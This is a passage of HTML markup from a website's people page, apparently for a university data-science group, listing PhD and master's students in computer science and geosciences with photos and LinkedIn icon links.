11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 